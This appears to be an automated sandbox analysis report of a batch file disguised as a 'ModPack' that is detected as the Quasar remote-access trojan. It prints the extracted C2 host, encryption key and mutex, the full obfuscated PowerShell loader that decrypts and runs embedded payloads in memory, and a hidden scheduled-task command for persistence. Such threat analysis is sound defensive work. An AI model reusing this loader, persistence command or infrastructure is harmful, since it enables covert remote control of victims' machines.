Analysis

  • max time kernel
    34s
  • max time network
    51s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240412-en
  • resource tags

    arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    13-04-2024 20:25

General

  • Target

    ModPack.bat

  • Size

    1.6MB

  • MD5

    3ab2a7793b323765353fa8e597cec156

  • SHA1

    c892cc5095ac6f37d0e94bbc09e11abe3d62027a

  • SHA256

    a2c3928e33f47ec7dd1caf488af3aecd0e829031740dda298513ef24795bad54

  • SHA512

    90c1a411b9b9cbcef33cc80c0f746ee67501e21998c8a85c7af868da450a8f7ab2a405562b3e9c9e26f77a4a75b9532d30816f20865dfdd29c555882ea72abcc

  • SSDEEP

    24576:zVHGMbIfHrrVuAAJ1wVKTV9QzlkWMGyR7mgVvIhiMej1Ma:pHEvrroBVykjea

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

notes-creation.gl.at.ply.gg:27030

Mutex

6735a92b-88d2-4fbe-8e59-605a85072109

Attributes
  • encryption_key

    8681483EF512C654BECF205A0D74FFCA4B129A98

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Trapix Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModPack.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1312
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WHU9LIZZZnpXvmHPYv+jvQzDV7636Q84bvp2wMYdDEY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WBD6QKFaFapBAwUbctfeFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XGRxz=New-Object System.IO.MemoryStream(,$param_var); $eoWcZ=New-Object System.IO.MemoryStream; $ZKHsZ=New-Object System.IO.Compression.GZipStream($XGRxz, [IO.Compression.CompressionMode]::Decompress); $ZKHsZ.CopyTo($eoWcZ); $ZKHsZ.Dispose(); $XGRxz.Dispose(); $eoWcZ.Dispose(); $eoWcZ.ToArray();}function execute_function($param_var,$param2_var){ $aqZjX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tUwTg=$aqZjX.EntryPoint; $tUwTg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModPack.bat';$qeekY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModPack.bat').Split([Environment]::NewLine);foreach ($hvTHj in $qeekY) { if ($hvTHj.StartsWith(':: ')) { $YbvrY=$hvTHj.Substring(3); break; }}$payloads_var=[string[]]$YbvrY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4140
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_130_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_130.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2664
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_130.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4536
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_130.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3632
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WHU9LIZZZnpXvmHPYv+jvQzDV7636Q84bvp2wMYdDEY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WBD6QKFaFapBAwUbctfeFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XGRxz=New-Object System.IO.MemoryStream(,$param_var); $eoWcZ=New-Object System.IO.MemoryStream; $ZKHsZ=New-Object System.IO.Compression.GZipStream($XGRxz, [IO.Compression.CompressionMode]::Decompress); $ZKHsZ.CopyTo($eoWcZ); $ZKHsZ.Dispose(); $XGRxz.Dispose(); $eoWcZ.Dispose(); $eoWcZ.ToArray();}function execute_function($param_var,$param2_var){ $aqZjX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tUwTg=$aqZjX.EntryPoint; $tUwTg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_130.bat';$qeekY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_130.bat').Split([Environment]::NewLine);foreach ($hvTHj in $qeekY) { if ($hvTHj.StartsWith(':: ')) { $YbvrY=$hvTHj.Substring(3); break; }}$payloads_var=[string[]]$YbvrY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            PID:2996

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    df472dcddb36aa24247f8c8d8a517bd7

    SHA1

    6f54967355e507294cbc86662a6fbeedac9d7030

    SHA256

    e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

    SHA512

    06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    eb15ee5741b379245ca8549cb0d4ecf8

    SHA1

    3555273945abda3402674aea7a4bff65eb71a783

    SHA256

    b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636

    SHA512

    1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ka45n225.sbu.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\startup_str_130.bat

    Filesize

    1.6MB

    MD5

    3ab2a7793b323765353fa8e597cec156

    SHA1

    c892cc5095ac6f37d0e94bbc09e11abe3d62027a

    SHA256

    a2c3928e33f47ec7dd1caf488af3aecd0e829031740dda298513ef24795bad54

    SHA512

    90c1a411b9b9cbcef33cc80c0f746ee67501e21998c8a85c7af868da450a8f7ab2a405562b3e9c9e26f77a4a75b9532d30816f20865dfdd29c555882ea72abcc

  • C:\Users\Admin\AppData\Roaming\startup_str_130.vbs

    Filesize

    115B

    MD5

    962ce75d684f70da0e30425299039aae

    SHA1

    6ee8d1ef71b54cbc4a81899e52450f50b4bec6f8

    SHA256

    232cbfca13c926ce3b974c4d45a69387a3ccf0d9e49f8ef41bc9fd231c590119

    SHA512

    5bb9d8d46c354d46f7b8f35efcd6eab499f299edc62ae836e45f06ec4ce2502cd551cc45aeb251bac4aaf0841fa257fe9f902dfa384f84518c877c86a6fd5c18

  • memory/2664-16-0x00007FFFD1940000-0x00007FFFD2402000-memory.dmp

    Filesize

    10.8MB

  • memory/2664-27-0x00000247C6D60000-0x00000247C6D70000-memory.dmp

    Filesize

    64KB

  • memory/2664-31-0x00007FFFD1940000-0x00007FFFD2402000-memory.dmp

    Filesize

    10.8MB

  • memory/2664-28-0x00000247C6D60000-0x00000247C6D70000-memory.dmp

    Filesize

    64KB

  • memory/2664-17-0x00000247C6D60000-0x00000247C6D70000-memory.dmp

    Filesize

    64KB

  • memory/2664-18-0x00000247C6D60000-0x00000247C6D70000-memory.dmp

    Filesize

    64KB

  • memory/2996-48-0x00007FFFD1940000-0x00007FFFD2402000-memory.dmp

    Filesize

    10.8MB

  • memory/2996-58-0x000002346FDF0000-0x000002346FE2C000-memory.dmp

    Filesize

    240KB

  • memory/2996-62-0x000002346EF40000-0x000002346EF50000-memory.dmp

    Filesize

    64KB

  • memory/2996-60-0x000002346EF40000-0x000002346EF50000-memory.dmp

    Filesize

    64KB

  • memory/2996-61-0x000002346EF40000-0x000002346EF50000-memory.dmp

    Filesize

    64KB

  • memory/2996-59-0x00007FFFD1940000-0x00007FFFD2402000-memory.dmp

    Filesize

    10.8MB

  • memory/2996-57-0x000002346F920000-0x000002346F932000-memory.dmp

    Filesize

    72KB

  • memory/2996-56-0x0000023470680000-0x0000023470842000-memory.dmp

    Filesize

    1.8MB

  • memory/2996-49-0x000002346EF40000-0x000002346EF50000-memory.dmp

    Filesize

    64KB

  • memory/2996-50-0x000002346EF40000-0x000002346EF50000-memory.dmp

    Filesize

    64KB

  • memory/2996-55-0x000002346FEB0000-0x000002346FF62000-memory.dmp

    Filesize

    712KB

  • memory/2996-53-0x000002346F4F0000-0x000002346F814000-memory.dmp

    Filesize

    3.1MB

  • memory/2996-54-0x000002346FDA0000-0x000002346FDF0000-memory.dmp

    Filesize

    320KB

  • memory/4140-52-0x00007FFFD1940000-0x00007FFFD2402000-memory.dmp

    Filesize

    10.8MB

  • memory/4140-13-0x0000020D2EBE0000-0x0000020D2EBE8000-memory.dmp

    Filesize

    32KB

  • memory/4140-6-0x00007FFFD1940000-0x00007FFFD2402000-memory.dmp

    Filesize

    10.8MB

  • memory/4140-12-0x0000020D2EBF0000-0x0000020D2EC00000-memory.dmp

    Filesize

    64KB

  • memory/4140-7-0x0000020D2EBF0000-0x0000020D2EC00000-memory.dmp

    Filesize

    64KB

  • memory/4140-8-0x0000020D2EBF0000-0x0000020D2EC00000-memory.dmp

    Filesize

    64KB

  • memory/4140-11-0x0000020D2EC70000-0x0000020D2EC92000-memory.dmp

    Filesize

    136KB

  • memory/4140-14-0x0000020D2F010000-0x0000020D2F142000-memory.dmp

    Filesize

    1.2MB